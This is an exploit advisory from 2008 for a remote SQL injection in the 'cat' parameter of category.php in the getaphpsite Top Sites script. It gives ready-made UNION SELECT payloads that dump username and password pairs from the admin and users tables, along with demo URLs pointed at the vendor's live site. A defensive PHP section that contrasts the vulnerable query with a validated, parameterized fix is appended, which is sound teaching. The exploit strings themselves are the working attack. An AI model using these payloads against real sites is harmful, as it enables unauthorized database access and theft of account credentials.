getaphpsite Top Sites suffers from a remote SQL injection vulnerability in category.php.
[~] getaphpsite Top Sites (cat) Remote Sql inj
[~]
[~] script: http://www.getaphpsite.com/24.html
[~]
[~]----------------------------------------------------------
[~] Discovered By: ZoRLu msn: trt-turk@hotmail.com
[~]
[~] Date: 31.12.2008
[~]
[~] Home: www.z0rlu.blogspot.com / www.experl.com
[~]
[~] NOTE: LONELINESS LOST ITS MEANING IN MY SOLITUDE : ( (
[~] -----------------------------------------------------------
Exploit:
http://z0rlu.blogspot.com/script/category.php?cat=[SQL1] or [SQL2]
[SQL1]=
3+union+select+1,concat(username,0x3a,password),3,4,5+from+admin
[SQL2]=
3+union+select+1,concat(username,0x3a,password),3,4,5+from+users
for demo:
http://www.getaphpsite.com/demos/topsites/category.php?cat=3+union+select+1,concat(username,0x3a,password),3,4,5+from+admin
or
http://www.getaphpsite.com/demos/topsites/category.php?cat=3+union+select+1,concat(username,0x3a,password),3,4,5+from+users
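As an added illustration from the defender's side (this is not the Top Sites source, whose schema and query are not on the page), the shape of bug the advisory describes beside a hardened category.php lookup. The `sites` table, its column names and the DSN are assumptions; the five selected columns mirror the five-column UNION in the exploit URLs above.

```php
<?php
// Added example, not code from the getaphpsite Top Sites package.
// Assumed schema: table `sites` with five columns (id, name, url, hits, added)
// filtered by an integer category id, matching the 1..5 column layout the
// injected UNION SELECT in the advisory lines up against.

function connect(): PDO
{
    // Placeholder credentials; replace with the real DSN.
    $db = new PDO('mysql:host=localhost;dbname=topsites;charset=utf8mb4', 'user', 'pass');
    $db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
    // Use real server-side prepared statements rather than client-side emulation.
    $db->setAttribute(PDO::ATTR_EMULATE_PREPARES, false);
    return $db;
}

// Vulnerable pattern (what the advisory's URLs exploit): the `cat` parameter is
// concatenated into the query text, so "3 union select ..." becomes part of the
// statement and the second SELECT's rows are rendered in the category listing.
function listCategoryVulnerable(PDO $db, array $get)
{
    $cat = $get['cat'];
    return $db->query("SELECT id, name, url, hits, added FROM sites WHERE cat = $cat");
}

// Hardened version: validate that `cat` is a positive integer before it goes
// anywhere near SQL, then bind it as a typed parameter. The query text never
// changes based on user input, so a UNION cannot be appended to it.
function listCategorySafe(PDO $db, array $get): array
{
    $cat = filter_var($get['cat'] ?? null, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($cat === false) {
        http_response_code(400);   // reject junk such as "3 union select ..."
        return [];
    }
    $stmt = $db->prepare('SELECT id, name, url, hits, added FROM sites WHERE cat = :cat');
    $stmt->bindValue(':cat', $cat, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$rows = listCategorySafe(connect(), $_GET);
foreach ($rows as $row) {
    echo htmlspecialchars($row['name'], ENT_QUOTES, 'UTF-8'), "\n";
}
```

Rejecting non-integer `cat` values with a 400 also gives a clean log signal: requests that fail the integer check are exactly the probes the advisory's URLs would produce.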
[~]----------------------------------------------------------------------
[~] Greetz tO: yildirimordulari.org & experl.com
[~]
[~]----------------------------------------------------------------------